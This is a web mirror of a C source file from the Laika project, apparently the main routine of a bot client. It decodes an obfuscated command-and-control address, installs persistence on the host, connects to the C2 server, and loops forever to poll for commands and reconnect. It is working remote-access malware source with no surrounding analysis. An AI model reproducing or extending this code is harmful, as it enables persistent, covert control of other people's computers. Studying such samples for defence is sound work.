mirror of
https://github.com/CPunch/Laika.git
synced 2024-11-22 13:00:05 +00:00
CPunch
5aecc1b63f
- VMBoxGen is built before shared lib - VMBoxGen has no reliance on the shared lib, just the config file - main config was moved to the root cmakelists
56 lines
1.4 KiB
C
56 lines
1.4 KiB
C
#include <stdio.h>
|
|
|
|
#include "lbox.h"
|
|
#include "lconfig.h"
|
|
#include "lerror.h"
|
|
#include "ltask.h"
|
|
#include "bot.h"
|
|
#include "shell.h"
|
|
#include "persist.h"
|
|
|
|
#ifdef _WIN32
|
|
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, INT nCmdShow) {
|
|
#else
|
|
int main() {
|
|
#endif
|
|
/* these boxes are really easy to dump, they're unlocked at the very start of execution and left in memory the entire time.
|
|
not only that but they're only obfuscating the ip & port, both are things anyone would see from opening wireshark */
|
|
LAIKA_BOX_SKID_START(char*, cncIP, LAIKA_CNC_IP);
|
|
LAIKA_BOX_SKID_START(char*, cncPORT, LAIKA_CNC_PORT);
|
|
struct sLaika_bot *bot;
|
|
|
|
#ifdef LAIKA_PERSISTENCE
|
|
laikaB_markRunning();
|
|
|
|
/* install persistence */
|
|
laikaB_tryPersist();
|
|
do {
|
|
#endif
|
|
bot = laikaB_newBot();
|
|
|
|
LAIKA_TRY
|
|
/* connect to test CNC */
|
|
laikaB_connectToCNC(bot, cncIP, cncPORT);
|
|
|
|
/* while connection is still alive, poll bot */
|
|
while (laikaS_isAlive((&bot->peer->sock))) {
|
|
laikaB_poll(bot);
|
|
}
|
|
LAIKA_TRYEND
|
|
|
|
/* bot was killed or it threw an error */
|
|
laikaB_freeBot(bot);
|
|
#ifdef LAIKA_PERSISTENCE
|
|
#ifdef _WIN32
|
|
Sleep(5000);
|
|
#else
|
|
sleep(5);
|
|
#endif
|
|
} while (1);
|
|
|
|
laikaB_unmarkRunning();
|
|
#endif
|
|
|
|
/* vm boxes are left opened */
|
|
return 0;
|
|
} |